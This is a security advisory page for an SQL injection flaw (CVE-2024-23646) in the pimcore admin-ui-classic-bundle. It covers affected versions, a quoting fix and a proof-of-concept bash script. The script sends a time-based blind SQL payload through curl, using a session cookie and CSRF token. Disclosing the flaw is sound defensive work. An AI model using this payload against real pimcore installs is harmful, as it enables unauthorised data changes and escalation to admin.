Security
Headlines
HeadlinesLatestCVEs

Headline

GHSA-cwx6-4wmf-c6xv: SQL Injection in Admin download files as zip

Summary

The application allows to create zip files from available files on the site. The parameter "selectedIds", is susceptible to SQL Injection.

Details

downloadAsZipJobsAction escape parameters, but downloadAsZipAddFilesAction not. The following code should be added:

  foreach ($selectedIds as $selectedId) {
      if ($selectedId) {
          $quotedSelectedIds[] = $db->quote($selectedId);
      }
  }

PoC

  • Set up an example project as described on https://github.com/pimcore/demon (demo package with example content)
  • Log In. Grab the X-pimcore-csrf-token header from any request to the backend, as well as the PHPSESSID cookie.
  • Run the following script, substituting the values accordingly:
#!/bin/bash
BASE_URL=http://localhost # REPLACE THIS!
CSRF_TOKEN="5133f9d5d28de7dbab39e33ac7036271284ee42e" # REPLACE THIS!
COOKIE="PHPSESSID=4312797207ba3b342b29218fa42f3aa3" # REPLACE THIS!
SQL="(select*from(select(sleep(6)))a)"

curl "${BASE_URL}/admin/asset/download-as-zip-add-files?_dc=1700573579093&id=1&selectedIds=1,${SQL}&offset=10&limit=5&jobId=655cb18a37b01" \
    -X GET \
    -H "X-pimcore-csrf-token: ${CSRF_TOKEN}" \
    -H "Cookie: ${COOKIE}" `
  • The response is delayed by 6 seconds.

Impact

Any backend user with very basic permissions can execute arbitrary SQL statements and thus alter any data or escalate their privileges to at least admin level.

ghsa
#sql#csrf#vulnerability#git#php

Package

composer pimcore/admin-ui-classic-bundle (Composer)

Affected versions

>= 1.0.0, < 1.3.2

Patched versions

1.3.2

Description

Summary

The application allows to create zip files from available files on the site. The parameter "selectedIds", is susceptible to SQL Injection.

Details

downloadAsZipJobsAction escape parameters, but downloadAsZipAddFilesAction not.
The following code should be added:

  foreach ($selectedIds as $selectedId) {
      if ($selectedId) {
          $quotedSelectedIds[] = $db->quote($selectedId);
      }
  }

PoC

  • Set up an example project as described on https://github.com/pimcore/demon (demo package with example content)

  • Log In. Grab the X-pimcore-csrf-token header from any request to the backend, as well as the PHPSESSID cookie.

  • Run the following script, substituting the values accordingly:

    #!/bin/bash BASE_URL=http://localhost # REPLACE THIS! CSRF_TOKEN="5133f9d5d28de7dbab39e33ac7036271284ee42e" # REPLACE THIS! COOKIE="PHPSESSID=4312797207ba3b342b29218fa42f3aa3" # REPLACE THIS! SQL="(select*from(select(sleep(6)))a)"

    curl “${BASE_URL}/admin/asset/download-as-zip-add-files?_dc=1700573579093&id=1&selectedIds=1,${SQL}&offset=10&limit=5&jobId=655cb18a37b01”
    -X GET
    -H “X-pimcore-csrf-token: ${CSRF_TOKEN}”
    -H “Cookie: ${COOKIE}” `

  • The response is delayed by 6 seconds.

Impact

Any backend user with very basic permissions can execute arbitrary SQL statements and thus alter any data or escalate their privileges to at least admin level.

References

  • GHSA-cwx6-4wmf-c6xv
  • pimcore/admin-ui-classic-bundle@363afef
  • https://nvd.nist.gov/vuln/detail/CVE-2024-23646
  • https://github.com/pimcore/admin-ui-classic-bundle/blob/1.x/src/Controller/Admin/Asset/AssetController.php#L2006
  • https://github.com/pimcore/admin-ui-classic-bundle/blob/1.x/src/Controller/Admin/Asset/AssetController.php#L2087
  • https://github.com/pimcore/admin-ui-classic-bundle/releases/tag/v1.3.2

wisconaut published to pimcore/admin-ui-classic-bundle

Jan 24, 2024

Published by the National Vulnerability Database

Jan 24, 2024

Published to the GitHub Advisory Database

Jan 24, 2024

Reviewed

Jan 24, 2024

Last updated

Jan 24, 2024

ghsa: Latest News

GHSA-hxf5-99xg-86hw: cap-std doesn't fully sandbox all the Windows device filenames